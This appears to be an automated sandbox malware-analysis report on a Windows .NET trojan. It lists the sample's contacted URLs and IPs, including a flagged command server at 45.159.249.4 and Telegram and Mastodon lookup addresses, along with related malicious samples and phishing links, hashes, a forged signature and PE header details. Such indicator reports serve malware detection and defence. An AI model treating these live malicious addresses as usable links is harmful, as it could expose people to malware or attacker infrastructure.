                                  https://climatejustice.social/avatars/original/missing.pngcvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://climatejustice.social/tags/gitlab&quot;cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://climatejustice.social/users/ffoleg94cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526458800.0000000004D54000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594549794.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341127759.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572585218.0000000004D75000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594578967.0000000004D75000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341146688.0000000004D09000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341135942.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.microsoft.ccvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://climatejustice.social/tags/gitea&quot;cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://joinmastodon.org/cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://climatejustice.social/cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://45.159.249.4/1474xcvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://climatejustice.globalcvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://t.me/korstonsalesicvtres.exe, 00000001.00000003.340494604.0000000004D0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://45.159.249.4:80cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      45.159.249.4
                                      		unknownRussian Federation
                                      		44676VMAGE-ASRUfalse
                                      167.86.107.75
                                      		climatejustice.socialGermany
                                      		51167CONTABODEtrue
                                      149.154.167.99
                                      		t.meUnited Kingdom
                                      		62041TELEGRAMRUfalse

                                      General Information

                                      Joe Sandbox Version:35.0.0 Citrine
                                      Analysis ID:679146
                                      Start date and time: 05/08/202210:48:112022-08-05 10:48:11 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 6m 52s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:uGfpJynSWM (renamed file extension from none to exe)
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:20
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@3/1@2/3
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 99.8% (good quality ratio 96.3%)
                                      • Quality average: 82.2%
                                      • Quality standard deviation: 28.2%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 56
                                      • Number of non-executed functions: 138
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 23.211.6.115
                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      10:49:12API Interceptor1x Sleep call for process: uGfpJynSWM.exe modified
                                      10:49:38API Interceptor5x Sleep call for process: cvtres.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      45.159.249.4spotify premium crack download 2022.exeGet hashmaliciousBrowse
                                      • 45.159.249.4/
                                      1VQ6ABwr2o.exeGet hashmaliciousBrowse
                                      • 45.159.249.4/
                                      167.86.107.75spotify premium crack download 2022.exeGet hashmaliciousBrowse
                                        o2p0l5hnl.exeGet hashmaliciousBrowse
                                          1VQ6ABwr2o.exeGet hashmaliciousBrowse
                                            8SnrvDGWye.exeGet hashmaliciousBrowse
                                              vRW6AR37S6.exeGet hashmaliciousBrowse
                                                ODWQOmztKz.exeGet hashmaliciousBrowse
                                                  DRiFhH5Ktl.exeGet hashmaliciousBrowse
                                                    build2.exeGet hashmaliciousBrowse
                                                      8v8QWQ35lQ.exeGet hashmaliciousBrowse
                                                        rwB7RhaNPT.exeGet hashmaliciousBrowse
                                                          build_2022-03-23_12-25.exeGet hashmaliciousBrowse
                                                            U3nGzOjlyF.exeGet hashmaliciousBrowse
                                                              bc3ozLWv5Q.exeGet hashmaliciousBrowse
                                                                DXqiIlR5yM.exeGet hashmaliciousBrowse
                                                                  149.154.167.99W6qKnnjMEiGet hashmaliciousBrowse
                                                                  • t.me/jhzljkhbsdklzjdlkzj281679827sjah
                                                                  snfstBXgxaGet hashmaliciousBrowse
                                                                  • t.me/cui8txvnmv

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  t.mehttps://vitalpbx.comGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  PtfqFnZtxB.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  7C2P2CKtTz.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  jeqBDEzDeE.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  vxSBCLoYso.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  51BF4Ql66U.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  https://telegra.ph/Cryptocurrency-makes-people-millionaires-at-15-people-per-hour---Page-406192-08-02Get hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  ulRYla6dh8.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  IrPYliXpsE.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  X0De3Qm2Ds.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  3zq7lZXEzv.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  ruVY4xVS8e.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  QlHPNl6mYe.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  5GJHicC86B.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  SIQ1gLOIP8.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  IXaw8zmk7w.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  lLFiMMqrwB.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  9sYZFjyEku.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  idfi20VDBi.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  9CDcLbo3Ki.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  climatejustice.socialspotify premium crack download 2022.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  o2p0l5hnl.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  1VQ6ABwr2o.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  8SnrvDGWye.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  vRW6AR37S6.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  ODWQOmztKz.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  DRiFhH5Ktl.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  build2.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  DB50D646494970B78887D4D84F52147C4CDBAA0B23CB4.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  8v8QWQ35lQ.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  rwB7RhaNPT.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  build_2022-03-23_12-25.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  U3nGzOjlyF.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  bc3ozLWv5Q.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  DXqiIlR5yM.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  VMAGE-ASRUMqYQkpHt4V.exeGet hashmaliciousBrowse
                                                                  • 45.159.248.53
                                                                  0LYwkmJsgj.exeGet hashmaliciousBrowse
                                                                  • 45.159.248.53
                                                                  P5u1ZAL6wF.exeGet hashmaliciousBrowse
                                                                  • 45.159.248.53
                                                                  VbeTpPMvvK.exeGet hashmaliciousBrowse
                                                                  • 45.159.248.53
                                                                  e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exeGet hashmaliciousBrowse
                                                                  • 45.159.248.53
                                                                  aTlGCwT504.exeGet hashmaliciousBrowse
                                                                  • 45.159.248.53
                                                                  a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exeGet hashmaliciousBrowse
                                                                  • 45.159.248.53
                                                                  lFqE59erhf.exeGet hashmaliciousBrowse
                                                                  • 45.8.144.151
                                                                  eW9zvrPzHg.exeGet hashmaliciousBrowse
                                                                  • 45.159.251.105
                                                                  spotify premium crack download 2022.exeGet hashmaliciousBrowse
                                                                  • 45.159.249.4
                                                                  jh6gyqcWFO.exeGet hashmaliciousBrowse
                                                                  • 45.159.249.5
                                                                  1VQ6ABwr2o.exeGet hashmaliciousBrowse
                                                                  • 45.159.249.4
                                                                  mjyYu0IKl5.exeGet hashmaliciousBrowse
                                                                  • 45.159.249.3
                                                                  kUZbNQF5ye.exeGet hashmaliciousBrowse
                                                                  • 45.8.145.243
                                                                  QhZOQYbYsp.exeGet hashmaliciousBrowse
                                                                  • 45.8.144.152
                                                                  PO copy.pdf.exeGet hashmaliciousBrowse
                                                                  • 194.116.216.120
                                                                  PO.pdf.exeGet hashmaliciousBrowse
                                                                  • 194.116.216.120
                                                                  Purchase_Info_410.docGet hashmaliciousBrowse
                                                                  • 31.184.233.109
                                                                  Purchase_Info_410.docGet hashmaliciousBrowse
                                                                  • 31.184.233.109
                                                                  oySHH6NkFX.exeGet hashmaliciousBrowse
                                                                  • 31.184.235.150
                                                                  CONTABODECSO_SOonDeputionDRDO2022.apkGet hashmaliciousBrowse
                                                                  • 213.136.80.208
                                                                  http://r.email.rdv360.com/tr/cl/tl7Wu25UHrnjkn5sfc0vx0u4dtyo0w00PXMuL2iagRDUR4r6sEL0l9C97pb-2sRztT-v8bXx-XwXmfdSPRXPxbz7LHu0VNziyeYAzkCiIjcvnS7WBSJwBh3b5lynhLuGZ-icKIPKLG1_Nge8zb9RKR3x8-eqdE9Z6NZ1eNGz7xHfVQji-8Y3Ly2KhJRTjnC_XVffoO3v2wTAX7vCTKg95DV-fGkRhyk0Etop2L_GVfVQwjhA4X5PZ4rHEGj4_1HhHvnPUbiBjyJo5lqUbQIGet hashmaliciousBrowse
                                                                  • 95.111.231.164
                                                                  What_is_digital_contract_note (df).jsGet hashmaliciousBrowse
                                                                  • 62.171.133.93
                                                                  http://kirov1.xyzGet hashmaliciousBrowse
                                                                  • 173.212.226.47
                                                                  http://sandnstardust.com/encrypteddocGet hashmaliciousBrowse
                                                                  • 161.97.143.32
                                                                  http://derweekge.com/vento/6523.exeGet hashmaliciousBrowse
                                                                  • 161.97.101.255
                                                                  list049.exeGet hashmaliciousBrowse
                                                                  • 95.111.231.164
                                                                  http://mixcracked.netGet hashmaliciousBrowse
                                                                  • 95.111.231.16
                                                                  http://yourjavascript.com/2301262113/mj.jsGet hashmaliciousBrowse
                                                                  • 5.189.183.184
                                                                  How_to_become_a_contract_specialist_for_the_government (siyb).jsGet hashmaliciousBrowse
                                                                  • 62.171.133.93
                                                                  product_list_95849.exeGet hashmaliciousBrowse
                                                                  • 95.111.231.164
                                                                  SecuriteInfo.com.Variant.Zusy.434746.19230.exeGet hashmaliciousBrowse
                                                                  • 213.136.93.169
                                                                  21ST2ctv26Get hashmaliciousBrowse
                                                                  • 95.212.118.96
                                                                  76ZuDhfcCeGet hashmaliciousBrowse
                                                                  • 95.212.120.217
                                                                  MG72133243812OR.xlsGet hashmaliciousBrowse
                                                                  • 173.212.193.249
                                                                  spotify premium crack download 2022.exeGet hashmaliciousBrowse
                                                                  • 167.86.107.75
                                                                  9A7NgHYmXM.exeGet hashmaliciousBrowse
                                                                  • 144.91.123.87
                                                                  PO No.27485758Julu763773782999999299292922.exeGet hashmaliciousBrowse
                                                                  • 213.136.93.169
                                                                  Air_canada_baggage_interline_agreement (puc).jsGet hashmaliciousBrowse
                                                                  • 62.171.133.93
                                                                  TNT_AWB_AND_INVOICE_098768.exeGet hashmaliciousBrowse
                                                                  • 207.180.240.109

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  37f463bf4616ecd445d4a1937da06e193CzQDO1WLI.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  ej2hDYMBXF.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  0qlnWcmhSC.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  http://www.malware-traffic-analysis.net/2018/02/16/index.htmlGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  SecuriteInfo.com.W32.AIDetectNet.01.19566.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  SecuriteInfo.com.W32.AIDetectNet.01.19595.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  RevisedSalesContractINV.htmlGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  SecuriteInfo.com.Trojan.MSIL.FormBook.IZFA.MTB.26806.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  Q3 Bonus1.HTMlGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  bf.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  Secured_angela.johnson_Audio_Message.htmGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  https://www.frontrush.com/FR_Web_App/Message/MessageTracking.aspx?code=ODYzOTUxNTsyNjM3ODcyODtSOzgxOTc7TA==-f+lhm4TMRSg=&redir=http://4267.s1oAXteFRf.beyondsm.com/?=accountsreceivable@seven.com.auGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  .htmlGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  download.jsGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  https://vps67241.inmotionhosting.com/~mombasavacation/kpl/MailUpdateFresh/index.html#Get hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  http://z2p5g.pwtel.pa-jakartautara.go.id.///?ZZZ#.Z21hY2RvbmFsZEBoaWdod29vZG9pbC5jb20=Get hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  https://cdeusa.od2.vtiger.com/pages/8f3624gue6_98246trf7Get hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  https://if7bh-hyaaa-aaaad-qdiha-cai.ic.fleek.co/#amanda.winters@maryland.govGet hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75
                                                                  https://app.pandadoc.com/p/cc564b25548c204ab0c9c5f5500517b910b213aa?Get hashmaliciousBrowse
                                                                  • 149.154.167.99
                                                                  • 167.86.107.75

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uGfpJynSWM.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\uGfpJynSWM.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):226
                                                                  Entropy (8bit):5.3467126928258955
                                                                  Encrypted:false
                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                  MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                  SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                  SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                  SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.77740759573974
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:uGfpJynSWM.exe
                                                                  File size:374960
                                                                  MD5:eb84aeef20ea974bf207dd6df8446567
                                                                  SHA1:624a1e8510a1d7f3ff05693c30d724f19aaf5a1a
                                                                  SHA256:9f532c8749bc71b3fc723d42f86300ae5a583515817da2aad40c858f163d01f8
                                                                  SHA512:b2cf0b9aaacfc8e2fd6c517c0e49ff977b44097904cdf84a7d2a8324fc9525d0937442bf433e9a442e46914caf529b3e37d86097a36a761291e13c100aa30d3a
                                                                  SSDEEP:6144:wZJyvX/Kbhi5cqHYUAze34brlMoiGmWMG7u7isZaozdV4vMqmKEVDA:UJyvki3HYeMrlvKG7QiWbV4vMqmKF
                                                                  TLSH:7784F09D3681758FC446FEF59AB01D145620BC6B0717C243E8B73A7C9A3D28BDE811AE
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.b..............0..............)... ...@....@.. ..............................BQ....`................................

                                                                  File Icon

                                                                  Icon Hash:0f4d494919151b03

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x45298e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x62D65AB0 [Tue Jul 19 07:18:08 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Authenticode Signature

                                                                  Signature Valid:false
                                                                  Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                  Error Number:-2146869232
                                                                  Not Before, Not After
                                                                  • 4/1/2020 5:00:00 PM 3/9/2023 4:00:00 AM
                                                                  Subject Chain
                                                                  • CN=Avast Software s.r.o., OU=RE stapler cistodc, O=Avast Software s.r.o., L=Praha, C=CZ
                                                                  Version:3
                                                                  Thumbprint MD5:58F27306512AAEE9028766C21733D912
                                                                  Thumbprint SHA-1:DB4336A6DC808C8F6A4944FA8E8D6A9E703F8915
                                                                  Thumbprint SHA-256:C2DCD22E0E7CB9619DF76810B301291CF07A18DF244C05D059A8BA2137E34CFE
                                                                  Serial:0970EF4BAD5CC44A1C2BC3D96401674C

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x529400x4b.text
